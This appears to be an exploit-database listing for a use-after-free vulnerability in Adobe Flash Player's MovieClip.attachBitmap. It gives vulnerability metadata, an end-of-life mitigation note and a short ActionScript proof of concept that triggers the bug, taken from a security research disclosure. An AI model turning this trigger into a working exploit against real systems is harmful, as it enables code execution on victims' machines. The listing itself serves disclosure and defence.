header-logo
Suggest Exploit
vendor:
Flash Player
by:
7.5
CVSS
HIGH
Use-after-free
416
CWE
Product Name: Flash Player
Affected Version From: Adobe Flash Player
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:adobe:flash_player
Metasploit:
Other Scripts:
Platforms Tested:

Use-after-free vulnerability in MovieClip.attachBitmap

The MovieClip.attachBitmap method in Adobe Flash Player is vulnerable to a use-after-free vulnerability. When the depth parameter is an object with the valueOf method defined, the method can free the MovieClip, which is then used, leading to potential code execution or crash.

Mitigation:

Adobe Flash Player is no longer supported and has reached end-of-life. It is recommended to uninstall Flash Player and use alternative technologies.
Source

Exploit-DB raw data:

Source: https://code.google.com/p/google-security-research/issues/detail?id=593

There is a use-after-free in MovieClip.attachBitmap. If the depth parameter is an object with valueOf defined, this method can free the MovieClip, which is then used.

A minimal PoC follows:

this.createEmptyMovieClip("mc", 1);
var b = new flash.display.BitmapData(100, 100, true, 0x77777777);
mc.attachBitmap( b, {valueOf : func });

function func(){
	
	mc.removeMovieClip();
	
        // Fix heap here

        return 5;
	
	}
	


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39040.zip

Navigation

Suggest Exploit

Services By CQR